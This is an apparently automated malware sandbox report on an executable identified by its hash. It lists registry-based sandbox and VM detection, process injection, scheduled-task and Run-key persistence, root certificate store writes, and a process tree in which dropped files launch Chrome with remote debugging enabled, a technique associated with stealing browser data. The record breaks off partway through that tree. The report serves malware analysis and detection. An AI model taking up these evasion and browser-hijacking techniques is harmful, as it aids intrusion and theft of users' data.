Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	7aencsM.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	7aencsM.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	8f9cdc126e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	7aencsM.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	468c3dbc43.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	8f9cdc126e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	7aencsM.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	468c3dbc43.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
1176	timeout.exe

Enumerates system info in registry 2 TTPs 12 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Kills process with taskkill 5 IoCs

pid	Process
2116	taskkill.exe
3096	taskkill.exe
3292	taskkill.exe
3308	taskkill.exe
2352	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

defense_evasion spyware trojan

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 5 IoCs

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	futors.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	futors.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	futors.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	monthdragon.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	monthdragon.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
288	schtasks.exe
2628	schtasks.exe
1824	schtasks.exe
776	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2788	f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe
2728	skotes.exe
1760	7aencsM.exe
1760	7aencsM.exe
2816	3omTNLZ.exe
876	chrome.exe
876	chrome.exe
2816	3omTNLZ.exe
2816	3omTNLZ.exe
2816	3omTNLZ.exe
2816	3omTNLZ.exe
1760	7aencsM.exe
2856	YMci4Rc.exe
2856	YMci4Rc.exe
2856	YMci4Rc.exe
2856	YMci4Rc.exe
2232	9aiiMOQ.exe
2232	9aiiMOQ.exe
2232	9aiiMOQ.exe
2232	9aiiMOQ.exe
296	NL58452.exe
296	NL58452.exe
296	NL58452.exe
296	NL58452.exe
2548	f3Ypd8O.exe
2548	f3Ypd8O.exe
2548	f3Ypd8O.exe
2548	f3Ypd8O.exe
2536	kdMujZh.exe
1296	powershell.exe
1296	powershell.exe
1296	powershell.exe
2564	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE
2536	kdMujZh.exe
1416	powershell.exe
2088	powershell.exe
1232	powershell.exe
2060	powershell.exe
2564	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE
2564	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE
2372	mcwnj.exe
2060	powershell.exe
2060	powershell.exe
2148	483d2fa8a0d53818306efeb32d3.exe
1812	8f9cdc126e.exe
2532	monthdragon.exe
2532	monthdragon.exe
2532	monthdragon.exe
2532	monthdragon.exe
1812	8f9cdc126e.exe
1812	8f9cdc126e.exe
1812	8f9cdc126e.exe
1812	8f9cdc126e.exe
1812	8f9cdc126e.exe
2560	f1c548477b.exe
2560	f1c548477b.exe
2560	f1c548477b.exe
2560	f1c548477b.exe
2560	f1c548477b.exe
2416	3a3b5fb167.exe
2616	6610a02fea.exe
888	chrome.exe
888	chrome.exe
1728	Bjkm5hE.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeShutdownPrivilege	876	chrome.exe
Token: SeShutdownPrivilege	876	chrome.exe
Token: SeShutdownPrivilege	876	chrome.exe
Token: SeShutdownPrivilege	876	chrome.exe
Token: SeShutdownPrivilege	876	chrome.exe
Token: SeShutdownPrivilege	876	chrome.exe
Token: SeShutdownPrivilege	876	chrome.exe
Token: SeShutdownPrivilege	876	chrome.exe
Token: SeShutdownPrivilege	876	chrome.exe
Token: SeShutdownPrivilege	876	chrome.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	1416	powershell.exe
Token: SeDebugPrivilege	2088	powershell.exe
Token: SeDebugPrivilege	1232	powershell.exe
Token: SeDebugPrivilege	2060	powershell.exe
Token: SeDebugPrivilege	2564	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE
Token: SeShutdownPrivilege	888	chrome.exe
Token: SeShutdownPrivilege	888	chrome.exe
Token: SeShutdownPrivilege	888	chrome.exe
Token: SeShutdownPrivilege	888	chrome.exe
Token: SeDebugPrivilege	3652	powershell.exe
Token: SeShutdownPrivilege	2904	chrome.exe
Token: SeShutdownPrivilege	2904	chrome.exe
Token: SeShutdownPrivilege	2904	chrome.exe
Token: SeShutdownPrivilege	2904	chrome.exe
Token: SeShutdownPrivilege	2904	chrome.exe
Token: SeShutdownPrivilege	2904	chrome.exe
Token: SeShutdownPrivilege	2904	chrome.exe
Token: SeShutdownPrivilege	2904	chrome.exe
Token: SeShutdownPrivilege	2904	chrome.exe
Token: SeShutdownPrivilege	2904	chrome.exe
Token: SeDebugPrivilege	3308	taskkill.exe
Token: SeShutdownPrivilege	2912	chrome.exe
Token: SeShutdownPrivilege	2912	chrome.exe
Token: SeShutdownPrivilege	2912	chrome.exe
Token: SeShutdownPrivilege	2912	chrome.exe
Token: SeDebugPrivilege	2352	taskkill.exe
Token: SeDebugPrivilege	2116	taskkill.exe
Token: SeDebugPrivilege	3096	taskkill.exe
Token: SeDebugPrivilege	3292	taskkill.exe
Token: SeDebugPrivilege	3104	powershell.exe
Token: SeDebugPrivilege	3224	firefox.exe
Token: SeDebugPrivilege	3224	firefox.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2788	f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
876	chrome.exe
2712	amnew.exe
1072	221457afdd.exe
1072	221457afdd.exe
1072	221457afdd.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe
888	chrome.exe

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
1072	221457afdd.exe
1072	221457afdd.exe
1072	221457afdd.exe
960	1c29bfe45e.exe
960	1c29bfe45e.exe
960	1c29bfe45e.exe
960	1c29bfe45e.exe
960	1c29bfe45e.exe
960	1c29bfe45e.exe
3904	dc4867a9cf.exe
3904	dc4867a9cf.exe
3904	dc4867a9cf.exe
960	1c29bfe45e.exe
3224	firefox.exe
3224	firefox.exe
3224	firefox.exe
960	1c29bfe45e.exe
960	1c29bfe45e.exe
960	1c29bfe45e.exe
960	1c29bfe45e.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2788 wrote to memory of 2728	2788	f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe	31
PID 2788 wrote to memory of 2728	2788	f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe	31
PID 2788 wrote to memory of 2728	2788	f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe	31
PID 2788 wrote to memory of 2728	2788	f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe	31
PID 2728 wrote to memory of 1372	2728	skotes.exe	33
PID 2728 wrote to memory of 1372	2728	skotes.exe	33
PID 2728 wrote to memory of 1372	2728	skotes.exe	33
PID 2728 wrote to memory of 1372	2728	skotes.exe	33
PID 1372 wrote to memory of 1760	1372	7aencsM.exe	34
PID 1372 wrote to memory of 1760	1372	7aencsM.exe	34
PID 1372 wrote to memory of 1760	1372	7aencsM.exe	34
PID 1372 wrote to memory of 1760	1372	7aencsM.exe	34
PID 1372 wrote to memory of 1760	1372	7aencsM.exe	34
PID 1372 wrote to memory of 1760	1372	7aencsM.exe	34
PID 1372 wrote to memory of 1760	1372	7aencsM.exe	34
PID 1372 wrote to memory of 1760	1372	7aencsM.exe	34
PID 1372 wrote to memory of 1760	1372	7aencsM.exe	34
PID 1372 wrote to memory of 1760	1372	7aencsM.exe	34
PID 1372 wrote to memory of 1760	1372	7aencsM.exe	34
PID 1372 wrote to memory of 1760	1372	7aencsM.exe	34
PID 1372 wrote to memory of 2756	1372	7aencsM.exe	35
PID 1372 wrote to memory of 2756	1372	7aencsM.exe	35
PID 1372 wrote to memory of 2756	1372	7aencsM.exe	35
PID 1372 wrote to memory of 2756	1372	7aencsM.exe	35
PID 1760 wrote to memory of 876	1760	7aencsM.exe	36
PID 1760 wrote to memory of 876	1760	7aencsM.exe	36
PID 1760 wrote to memory of 876	1760	7aencsM.exe	36
PID 1760 wrote to memory of 876	1760	7aencsM.exe	36
PID 876 wrote to memory of 2476	876	chrome.exe	37
PID 876 wrote to memory of 2476	876	chrome.exe	37
PID 876 wrote to memory of 2476	876	chrome.exe	37
PID 2728 wrote to memory of 2816	2728	skotes.exe	38
PID 2728 wrote to memory of 2816	2728	skotes.exe	38
PID 2728 wrote to memory of 2816	2728	skotes.exe	38
PID 2728 wrote to memory of 2816	2728	skotes.exe	38
PID 876 wrote to memory of 2916	876	chrome.exe	39
PID 876 wrote to memory of 2916	876	chrome.exe	39
PID 876 wrote to memory of 2916	876	chrome.exe	39
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41
PID 876 wrote to memory of 3000	876	chrome.exe	41

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe
"C:\Users\Admin\AppData\Local\Temp\f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2788
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2728
- - C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
    "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1372
  - - C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
      "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1760
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:876
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef77c9758,0x7fef77c9768,0x7fef77c9778
        6⤵
        
        PID:2476
      - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        6⤵
        
        PID:2916
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:2
        6⤵
        
        PID:3000
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1560 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:8
        6⤵
        
        PID:2060
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1624 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:8
        6⤵
        
        PID:2776
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2296 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2828
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
